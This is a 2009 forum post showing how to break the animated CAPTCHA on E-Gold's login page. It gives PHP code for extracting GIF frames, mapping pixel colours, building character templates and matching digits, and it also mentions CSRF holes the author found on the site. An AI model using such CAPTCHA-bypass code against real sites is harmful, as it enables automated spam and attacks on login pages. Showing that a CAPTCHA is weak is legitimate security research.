Page 1 of 1

Here's how to crack a 4D (4th dimension) CAPTCHA like E-Gold

Posted: Mon Jan 05, 2009 3:22 pm
by kaisellgren
Hello everybody!

Today I'll share some tips about OCR. I'll talk about the CAPTCHA of E-Gold. The CAPTCHA can be found at http://www.e-gold.com, more precisely at https://www.e-gold.com/acct/login.html

I have constructed my own OCR tool into one file EGOCR.php which takes a GET argument and outputs the final result. It seems to work with around 90-95% success rate. I am not providing full source for the OCR tool, but rather some sample code snippets and theories.

Here's an example what the CAPTCHA looks like:
Image

This topic is not meant to harm E-Gold, and I am only providing the theories and techniques here - not a full script that does all-in-one for you. If you are trying to harm E-Gold website, you are solely responsible for your actions. This information is provided for educational purposes only.

Let me first tell you something about CAPTCHAs. They are meant to identify the type of the user (a bot or a human). They do not completely prevent spamming (like manual human spammers). They add a little bit extra load on the servers, but they effectively reduce the amount of spam you may receive. The Internet is full of different CAPTCHAs. The general idea of making a good CAPTCHA is to use the advantage of human mind. There are 2D (2nd dimension) and 3D (3rd dimension) CAPTCHAs, which both are good. However, general misconception is to think that 4D (4th dimension) CAPTCHAs are good. They provide no additional certainty. Today I will show you how ridiculously weak is the 4D CAPTCHA used in E-Gold's website.

When writing an OCR tool, there is no ultimate tool that works on all CAPTCHAs. In this OCR tool we will split it into the following parts:
- GIF Decoder
- CCMap
- LibMaker
- OCR

GIF Decoder
First thing we need to do is to extract all frames of our CAPTCHA.

Here's our decoder class (from http://www.phpclasses.org/browse/package/3163.html):

Code: Select all

Class GIFDecoder {
    var $GIF_buffer = Array ( );
    var $GIF_arrays = Array ( );
    var $GIF_delays = Array ( );
    var $GIF_stream = "";
    var $GIF_string = "";
    var $GIF_bfseek =  0;
 
    var $GIF_screen = Array ( );
    var $GIF_global = Array ( );
    var $GIF_sorted;
    var $GIF_colorS;
    var $GIF_colorC;
    var $GIF_colorF;
    function GIFDecoder ( $GIF_pointer ) {
        $this->GIF_stream = $GIF_pointer;
 
        GIFDecoder::GIFGetByte ( 6 );    // GIF89a
        GIFDecoder::GIFGetByte ( 7 );    // Logical Screen Descriptor
 
        $this->GIF_screen = $this->GIF_buffer;
        $this->GIF_colorF = $this->GIF_buffer [ 4 ] & 0x80 ? 1 : 0;
        $this->GIF_sorted = $this->GIF_buffer [ 4 ] & 0x08 ? 1 : 0;
        $this->GIF_colorC = $this->GIF_buffer [ 4 ] & 0x07;
        $this->GIF_colorS = 2 << $this->GIF_colorC;
 
        if ( $this->GIF_colorF == 1 ) {
            GIFDecoder::GIFGetByte ( 3 * $this->GIF_colorS );
            $this->GIF_global = $this->GIF_buffer;
        }
        for ( $cycle = 1; $cycle; ) {
            if ( GIFDecoder::GIFGetByte ( 1 ) ) {
                switch ( $this->GIF_buffer [ 0 ] ) {
                    case 0x21:
                        GIFDecoder::GIFReadExtensions ( );
                        break;
                    case 0x2C:
                        GIFDecoder::GIFReadDescriptor ( );
                        break;
                    case 0x3B:
                        $cycle = 0;
                        break;
                }
            }
            else {
                $cycle = 0;
            }
        }
    }
    function GIFReadExtensions ( ) {
        GIFDecoder::GIFGetByte ( 1 );
        for ( ; ; ) {
            GIFDecoder::GIFGetByte ( 1 );
            if ( ( $u = $this->GIF_buffer [ 0 ] ) == 0x00 ) {
                break;
            }
            GIFDecoder::GIFGetByte ( $u );
 
            if ( $u == 4 ) {
                $this->GIF_delays [ ] = ( $this->GIF_buffer [ 1 ] | $this->GIF_buffer [ 2 ] << 8 );
            }
        }
    }
    function GIFReadDescriptor ( ) {
        $GIF_screen    = Array ( );
 
        GIFDecoder::GIFGetByte ( 9 );
        $GIF_screen = $this->GIF_buffer;
        $GIF_colorF = $this->GIF_buffer [ 8 ] & 0x80 ? 1 : 0;
        if ( $GIF_colorF ) {
            $GIF_code = $this->GIF_buffer [ 8 ] & 0x07;
            $GIF_sort = $this->GIF_buffer [ 8 ] & 0x20 ? 1 : 0;
        }
        else {
            $GIF_code = $this->GIF_colorC;
            $GIF_sort = $this->GIF_sorted;
        }
        $GIF_size = 2 << $GIF_code;
        $this->GIF_screen [ 4 ] &= 0x70;
        $this->GIF_screen [ 4 ] |= 0x80;
        $this->GIF_screen [ 4 ] |= $GIF_code;
        if ( $GIF_sort ) {
            $this->GIF_screen [ 4 ] |= 0x08;
        }
        $this->GIF_string = "GIF87a";
        GIFDecoder::GIFPutByte ( $this->GIF_screen );
        if ( $GIF_colorF == 1 ) {
            GIFDecoder::GIFGetByte ( 3 * $GIF_size );
            GIFDecoder::GIFPutByte ( $this->GIF_buffer );
        }
        else {
            GIFDecoder::GIFPutByte ( $this->GIF_global );
        }
        $this->GIF_string .= chr ( 0x2C );
        $GIF_screen [ 8 ] &= 0x40;
        GIFDecoder::GIFPutByte ( $GIF_screen );
        GIFDecoder::GIFGetByte ( 1 );
        GIFDecoder::GIFPutByte ( $this->GIF_buffer );
        for ( ; ; ) {
            GIFDecoder::GIFGetByte ( 1 );
            GIFDecoder::GIFPutByte ( $this->GIF_buffer );
            if ( ( $u = $this->GIF_buffer [ 0 ] ) == 0x00 ) {
                break;
            }
            GIFDecoder::GIFGetByte ( $u );
            GIFDecoder::GIFPutByte ( $this->GIF_buffer );
        }
        $this->GIF_string .= chr ( 0x3B );
        /*
           Add frames into $GIF_stream array...
        */
        $this->GIF_arrays [ ] = $this->GIF_string;
    }
 
    function GIFGetByte ( $len ) {
        $this->GIF_buffer = Array ( );
 
        for ( $i = 0; $i < $len; $i++ ) {
            if ( $this->GIF_bfseek > strlen ( $this->GIF_stream ) ) {
                return 0;
            }
            $this->GIF_buffer [ ] = ord ( $this->GIF_stream { $this->GIF_bfseek++ } );
        }
        return 1;
    }
 
    function GIFPutByte ( $bytes ) {
        for ( $i = 0; $i < count ( $bytes ); $i++ ) {
            $this->GIF_string .= chr ( $bytes [ $i ] );
        }
    }
 
    function GIFGetFrames ( ) {
        return ( $this->GIF_arrays );
    }
 
    function GIFGetDelays ( ) {
        return ( $this->GIF_delays );
    }
}
And we run it for our downloaded/curled, wtvr CAPTCHA from E-Gold like:

Code: Select all

$image_to_break = 'gen3.gif'; // the CAPTCHA imagefile
$image_to_break = fread (fopen ($image_to_break,'rb'), filesize($image_to_break));
$decoder = new GIFDecoder ($image_to_break);
$frames = $decoder->GIFGetFrames();
for ( $i = 0; $i < count ( $frames ); $i++ ) {
$fname = ( $i < 10 ) ? "frame0$i.gif" : "frame$i.gif";
fwrite ( fopen ( $fname, "wb" ), $frames [ $i ] );
}
Now we should have all the frames extracted like frame01.gif, ..., frameN.gif

CCMap
CCMap stands for Character Color Map. It's a tool used in OCRing. Not always, sometimes. Probably every OCRer has their own way to do this, but here's my script:

Code: Select all

<?php
 
$im = imagecreatefromgif('frame09.gif');
function rgbhex($red,$green,$blue)
 {
  $red = dechex($red);
  $green = dechex($green);
  $blue = dechex($blue);
  return '#'.strtoupper($red.$green.$blue);
 }
 
$width=121; // Since its constant, no dynamic dimension loading needed
$height=25;
echo '<body style="margin: 0px; background-color: #000;"><div style="font-family: Courier New; width: 8000px;">';
for ($x = 0;$x < $width;$x++)
   {
    $xxx = str_pad($x,3,'0',STR_PAD_LEFT);
    echo '<div style="color: #ffffff; display: inline;">'.$xxx.' </div>';
   }
  echo '<br />';
for ($y = 0;$y < $height;$y++)
 {
  for ($x = 0;$x < $width;$x++)
   {
    $color = imagecolorat($im,$x,$y);
    $r = ($color >> 16) & 0xFF;
    $g = ($color >> 8) & 0xFF;
    $b = $color & 0xFF;
    if ($color != 1)
         echo '<div style="color: '.rgbhex($r,$g,$b).'; display: inline;">';
         else echo '<div style="color: #ffffff; display: inline;">';
    echo str_pad($color,3,'0',STR_PAD_LEFT).' </div>';
   }
  echo '<br />';
 }
echo '</div>';
imagedestroy($im);
 
?>
Let me explain this. This script is a tool. It shows you quickly how the letters are constructed in the colorspace. Basically if you run this script for any E-Gold frame, you get something like: http://i39.tinypic.com/2s8fjo1.png

The way we break our E-Gold, we make a library of characters. We use this tool to see the X,Y -cordinates of letters and their structure. I will librarize that letter 8 from the CAPTCHA. In the picture above, our letter 8 starts from X position 9, ends at X position 24. Remeber these.

Libmaker
Here's another tool I used OCRing E-Gold. This makes a CCMap into "a lib". Sometimes it can be just an array like I have in here - sometimes more complicated.

Code: Select all

<?php
 
$im = imagecreatefromgif('frame13.gif');
$width=121;
$height=25;
echo '$nro_8_lib = array(';
for ($y = 0;$y < $height;$y++)
 {
  for ($x = 9;$x <= 24;$x++)
   {
    $color = imagecolorat($im,$x,$y);
    echo "$color,";
   }
  echo '<br />';
 }
echo ');';
imagedestroy($im);
 
?>
The numbers 9 and 24 in the for loop are from the previous tool. The above code will output something like:
$nro_8_lib = array(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,
0,0,1,1,1,1,1,1,1,0,1,1,1,1,1,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,0,
1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,
0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
);
As you can see from the array, it has a letter '8' in it. We need this in the final OCR tool.

OCR
A basic demonstration to detect the CCMap we wanted to detect.

Code: Select all

<?php
 
$a = 0;
while (true)
 {
  $a++;
  $framename = ($a < 10) ? "frame0$a.gif" : "frame$a.gif";
  if (!file_exists($framename))
   break; // Still nothing found? Damn, didn't work..
  $im = imagecreatefromgif($framename);
  $width=121;
  $height=25;
  // Looking for the letter 8
  $nro_8_lib = array(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,
0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,
0,0,1,1,1,1,1,1,1,0,1,1,1,1,1,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,0,
1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,
1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,
0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,
0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
);
  for ($x = 8;$x <= 10;$x++)
   {
    for ($y = 0;$y <= 2;$y++)
     {
      $matched = 0;
      for ($i = 0,$ii = count($nro_8_lib);$i < $ii;$i++)
       {
        $xx = $i % 16;
        if ($i != 0)
         $yy = floor($i/16);
        else
         $yy = 0;
        $color_in_lib = $nro_8_lib[$i];
        if ($xx+$x < 121 && $yy+$y < 25)
        $color_in_img = imagecolorat($im,$xx+$x,$yy+$y);
        else
        $color_in_img=6666;
        if ($color_in_lib == $color_in_img)
         $matched++;
       }
      if (count($nro_8_lib)/$matched < 1.05)
       {
        echo 'Letter 8 was found at '.$framename.' at pixel position '.$x.','.$y.' MATCH: '.count($nro_8_lib)/$matched.'<br />';
        exit;
       }
     }
   }
  imagedestroy($im);
 }
 
?>
When I ran it against this image:
Image
It outputted:
Letter 8 was found at frame13.gif at pixel position 9,0 MATCH: 1

We used our letter 8 array in the final OCR file. We would put all characters that E-Gold uses (1,2,3,4,5,6,7,8,9) as an array to there and loop them all. In the end, we would just compare all of the matched characters, their found-at-x-position and sort plus list based on that to make it a complete word like 813324 in this case. Also, the E-Gold rotates the chars a bit and uses a bit different sizes. You need to use other OCR tools for those like CRot or you could just automate everything. Or you can try to change the line

Code: Select all

if (count($nro_8_lib)/$matched < 1.05)
To something less restrictive. Like 1.2 or something. This is for lazy people who have don't want to spend more time and are happy with less accurate results.

The purpose of this thread is to not give you a full made OCR that you can use to spam and crack E-Gold website. I will not provide anyone any additional code for complete the rest. I rather wanted to show how weak the CAPTCHA really is.

So what are the benefits of all this? For me, nothing except the pure fun of learning and beating something. :twisted:

If you want to continue from here to finish the OCR process, go ahead. You need a few (actually a couple of) more tools to complete it. You also may want to optimize the code since the code I provided here is solely meant to defeat the CAPTCHA - not to effectively spam E-Gold as many times as possible per second.

By the way, I found two CSRF holes from E-Gold's website and the website uses RC4 SSL which I don't think is best for their business. They also lack of identity file and their security advices are not too precise..

I hope E-Gold hires a new security professional. :)